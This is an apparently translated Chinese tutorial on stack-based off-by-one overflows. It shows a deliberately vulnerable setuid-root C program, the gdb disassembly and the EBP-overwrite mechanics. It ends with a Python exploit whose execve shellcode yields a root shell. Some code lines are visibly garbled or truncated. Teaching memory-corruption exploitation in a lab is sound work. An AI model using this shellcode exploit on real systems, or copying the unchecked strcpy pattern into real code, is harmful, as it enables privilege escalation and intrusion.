Off-By-One 漏洞(基于栈)


原文:Off-By-One Vulnerability (Stack Based)

虚拟机安装:Ubuntu 12.04(x86)

什么是off by one?

将源字符串复制到目标缓冲区可能会导致off by one



一如既往的充分的定义,让我们来看看off by one的漏洞代码!


  1. //vuln.c
  2. #include <stdio.h>
  3. #include <string.h>
  4. void foo(char* arg);
  5. void bar(char* arg);
  6. void foo(char* arg) {
  7. bar(arg); /* [1] */
  8. }
  9. void bar(char* arg) {
  10. char buf[256];
  11. strcpy(buf, arg); /* [2] */
  12. }
  13. int main(int argc, char *argv[]) {
  14. if(strlen(argv[1])>256) { /* [3] */
  15. printf("Attempted Buffer Overflow\n");
  16. fflush(stdout);
  17. return -1;
  18. }
  19. foo(argv[1]); /* [4] */
  20. return 0;
  21. }


  1. #echo 0 > /proc/sys/kernel/randomize_va_space
  2. $gcc -fno-stack-protector -z execstack -mpreferred-stack-boundary=2 -o vuln vuln.c
  3. $sudo chown root vuln
  4. $sudo chgrp root vuln
  5. $sudo chmod +s vuln

上述漏洞代码的第[2]行是可能发生off by one溢出的地方。目标缓冲区长度为256,因此长度为256字节的源字符串可能导致任意代码执行。


使用称为“EBP覆盖”的技术实现任意代码执行。如果调用者的EBP位于目标缓冲区之上,则在strcpy之后,单个NULL字节将覆盖调用者EBP的LSB。要了解更多关于off by one,让我们反汇编漏洞代码并绘制它的堆栈布局。


  1. (gdb) disassemble main
  2. Dump of assembler code for function main:
  3. //Function Prologue
  4. 0x08048497 <+0>: push %ebp //backup caller's ebp
  5. 0x08048498 <+1>: mov %esp,%ebp //set callee's (main) ebp to esp
  6. 0x0804849a <+3>: push %edi //backup EDI
  7. 0x0804849b <+4>: sub $0x8,%esp //create stack space
  8. 0x0804849e <+7>: mov 0xc(%ebp),%eax //eax = argv
  9. 0x080484a1 <+10>: add $0x4,%eax //eax = &argv[1]
  10. 0x080484a4 <+13>: mov (%eax),%eax //eax = argv[1]
  11. 0x080484a6 <+15>: movl $0xffffffff,-0x8(%ebp) //String Length Calculation -- Begins here
  12. 0x080484ad <+22>: mov %eax,%edx
  13. 0x080484af <+24>: mov $0x0,%eax
  14. 0x080484b4 <+29>: mov -0x8(%ebp),%ecx
  15. 0x080484b7 <+32>: mov %edx,%edi
  16. 0x080484b9 <+34>: repnz scas %es:(%edi),%al
  17. 0x080484bb <+36>: mov %ecx,%eax
  18. 0x080484bd <+38>: not %eax
  19. 0x080484bf <+40>: sub $0x1,%eax //String Length Calculation -- Ends here
  20. 0x080484c2 <+43>: cmp $0x100,%eax //eax = strlen(argv[1]). if eax > 256
  21. 0x080484c7 <+48>: jbe 0x80484e9 <main+82> //Jmp if NOT greater
  22. 0x080484c9 <+50>: movl $0x80485e0,(%esp) //If greater print error string,flush and return.
  23. 0x080484d0 <+57>: call 0x8048380 <puts@plt>
  24. 0x080484d5 <+62>: mov 0x804a020,%eax
  25. 0x080484da <+67>: mov %eax,(%esp)
  26. 0x080484dd <+70>: call 0x8048360 <fflush@plt>
  27. 0x080484e2 <+75>: mov $0x1,%eax
  28. 0x080484e7 <+80>: jmp 0x80484fe <main+103>
  29. 0x080484e9 <+82>: mov 0xc(%ebp),%eax //argv[1] <= 256, eax = argv
  30. 0x080484ec <+85>: add $0x4,%eax //eax = &argv[1]
  31. 0x080484ef <+88>: mov (%eax),%eax //eax = argv[1]
  32. 0x080484f1 <+90>: mov %eax,(%esp) //foo arg
  33. 0x080484f4 <+93>: call 0x8048464 //call foo
  34. 0x080484f9 <+98>: mov $0x0,%eax //return value
  35. //Function Epilogue
  36. 0x080484fe <+103>: add $0x8,%esp //unwind stack space
  37. 0x08048501 <+106>: pop %edi //restore EDI
  38. 0x08048502 <+107>: pop %ebp //restore EBP
  39. 0x08048503 <+108>: ret //return
  40. End of assembler dump.
  41. (gdb) disassemble foo
  42. Dump of assembler code for function foo:
  43. //Function prologue
  44. 0x08048464 <+0>: push %ebp //backup caller's (main) ebp
  45. 0x08048465 <+1>: mov %esp,%ebp //set callee's (foo) ebp to esp
  46. 0x08048467 <+3>: sub $0x4,%esp //create stack space
  47. 0x0804846a <+6>: mov 0x8(%ebp),%eax //foo arg
  48. 0x0804846d <+9>: mov %eax,(%esp) //bar arg = foo arg
  49. 0x08048470 <+12>: call 0x8048477 //call bar
  50. //Function Epilogue
  51. 0x08048475 <+17>: leave //unwind stack space + restore ebp
  52. 0x08048476 <+18>: ret //return
  53. End of assembler dump.
  54. (gdb) disassemble bar
  55. Dump of assembler code for function bar:
  56. //Function Prologue
  57. 0x08048477 <+0>: push %ebp //backup caller's (foo) ebp
  58. 0x08048478 <+1>: mov %esp,%ebp //set callee's (bar) ebp to esp
  59. 0x0804847a <+3>: sub $0x108,%esp //create stack space
  60. 0x08048480 <+9>: mov 0x8(%ebp),%eax //bar arg
  61. 0x08048483 <+12>: mov %eax,0x4(%esp) //strcpy arg2
  62. 0x08048487 <+16>: lea -0x100(%ebp),%eax //buf
  63. 0x0804848d <+22>: mov %eax,(%esp) //strcpy arg1
  64. 0x08048490 <+25>: call 0x8048370 <strcpy@plt> //call strcpy
  65. //Function Epilogue
  66. 0x08048495 <+30>: leave //unwind stack space + restore ebp
  67. 0x08048496 <+31>: ret //return
  68. End of assembler dump.
  69. (gdb)


Off-By-One 漏洞(基于栈) - 图1

当我们已经知道256字节的用户输入,用空字节可以覆盖foo的EBP的LSB。所以当foo的存储在目标缓冲区buf之上的EBP被一个NULL字节所覆盖时,ebp从0xbffff2d8变为0xbffff200。从堆栈布局我们可以看到堆栈位置0xbffff200是目标缓冲区buf的一部分,由于用户输入被复制到该目标缓冲区,攻击者可以控制这个堆栈位置(0xbffff200),因此他控制指令指针(eip )使用他可以实现任意代码执行。让我们通过发送一系列256的“A”来测试它。


  1. (gdb) r `python -c 'print "A"*256'`
  2. Starting program: /home/sploitfun/lsploits/new/obo/stack/vuln `python -c 'print "A"*256'`
  3. Program received signal SIGSEGV, Segmentation fault.
  4. 0x41414141 in ?? ()
  5. (gdb) p/x $eip
  6. $1 = 0x41414141
  7. (gdb)



现在,我们可以从目标缓冲区buf的起始位置开始找到偏移量,我们需要替换我们的返回地址。记住在off by one 漏洞中,我们不会覆盖堆栈中存储的实际返回地址(像我们在基于堆栈的缓冲区溢出中),而是攻击者控制的目标缓冲区buf内的4字节内存区域将被视为返回地址位置(在off by one溢出之后)。因此,我们需要找到这个返回地址位置偏移量(从buf),它是目标缓冲区buf本身的一部分。不是很清楚,但是没有问题继续阅读!


  • 0x08048490 - 调用strcpy - 此指令执行导致逐个溢出,因此foo的EBP值(存储在堆栈位置0xbffff2cc)从0xbffff2d8更改为0xbffff200
  • 0x08048495 - leave - leave指令解开此函数的堆栈空间并恢复ebp。
  1. leave: mov ebp, esp; //unwind stack space by setting esp to ebp.
  2. pop ebp; //restore ebp
  3. *** As per our example: ***
  4. leave: mov ebp, esp; //esp = ebp = 0xbffff2cc
  5. pop ebp; //ebp = 0xbffff200 (Overwritten EBP value is now stored in ebp register); esp = 0xbffff2d0
  • 0x08048495 - ret - 返回到foo的指令0x08048475
  • 0x08048475 - leave - leave指令解除此函数的堆栈空间并恢复ebp。
  1. *** As per our example: ***
  2. leave: mov ebp, esp; //esp = ebp = 0xbffff200 (As part of unwinding esp is shifted down instead of up!!)
  3. pop ebp; //ebp = 0x41414141; esp = 0xbffff204
  • 0x08048476 - ret - 返回到位于ESP(0xbffff204)的指令。现在,ESP指向攻击者控制的缓冲区,因此攻击者可以返回到任何要实现任意代码执行的位置。

现在让我们回到我们原始的测试,找到从目标缓冲区buf到返回地址的偏移量。如我们的堆栈布局图所示,buf位于0xbffff158,在CPU执行后,我们知道目标缓冲区buf中的返回地址位于0xbffff204。因此,从buf到返回地址的偏移量为0xbffff204 - 0xbffff158 = 0xac。因此,用户输入的形式"A"* 172 +"B"* 4 +"A"* 80,用BBBB覆盖EIP。

  1. $ cat
  3. #!/usr/bin/env python
  4. import struct
  5. from subprocess import call
  6. buf = "A" * 172
  7. buf += "B" * 4
  8. buf += "A" * 80
  9. print "Calling vulnerable program"
  10. call(["./vuln", buf])
  11. $ python
  12. Calling vulnerable program
  13. $ sudo gdb -q vuln
  14. Reading symbols from /home/sploitfun/lsploits/new/obo/stack/vuln...(no debugging symbols found)...done.
  15. (gdb) core-file core
  16. [New LWP 4055]
  17. warning: Can't read pathname for load map: Input/output error.
  19. Program terminated with signal 11, Segmentation fault.
  20. #0 0x42424242 in ?? ()
  21. (gdb) p/x $eip
  22. $1 = 0x42424242
  23. (gdb)



  2. #!/usr/bin/env python
  3. import struct
  4. from subprocess import call
  5. #Spawn a shell.
  6. #execve(/bin/sh) Size- 28 bytes.
  7. scode = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80\x90\x90\x90"
  8. ret_addr = 0xbffff218
  9. #endianess conversion
  10. def conv(num):
  11. return struct.pack("<I",numturn Address + NOP's + Shellcode + Junk
  12. buf = "A" * 172
  13. buf += conv(ret_addr)
  14. buf += "\x90" * 30
  15. buf += scode
  16. buf += "A" * 22
  17. print "Calling vulnerable program"
  18. call(["./vuln", buf])

执行上面的exploit程序给我们root shell,如下所示:

  1. $ python
  2. Calling vulnerable program
  3. # id
  4. uid=1000(sploitfun) gid=1000(sploitfun) euid=0(root) egid=0(root) groups=0(root),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),109(lpadmin),124(sambashare),1000(sploitfun)
  5. # exit
  6. $

off by one看起来像一个愚蠢的bug,它令人奇怪的地方是开发人员造成这么小的错误可能会导致任意代码执行。off by one总是导致任意代码执行吗?





  1. ...
  2. void bar(char* arg) {
  3. int x = 10; /* [1] */
  4. char buf[256]; /* [2] */
  5. strcpy(buf, arg); /* [3] */
  6. }
  7. ...


情况2:对齐空间 - 默认情况下,gcc将堆栈空间对齐为16字节边界,即在创建堆栈空间之前)ESP的最后4位是0并且使用and指令,如下面的函数反汇编所示。

  1. Dump of assembler code for function main:
  2. 0x08048497 <+0>: push %ebp
  3. 0x08048498 <+1>: mov %esp,%ebp
  4. 0x0804849a <+3>: push %edi
  5. 0x0804849b <+4>: and $0xfffffff0,%esp //Stack space aligned to 16 byte boundary
  6. 0x0804849e <+7>: sub $0x20,%esp //create stack space
  7. ...


因为这个原因,我们在编译我们漏洞代码(vuln.c)时添加了gcc参数-mpreferred-stack-boundary = 2!

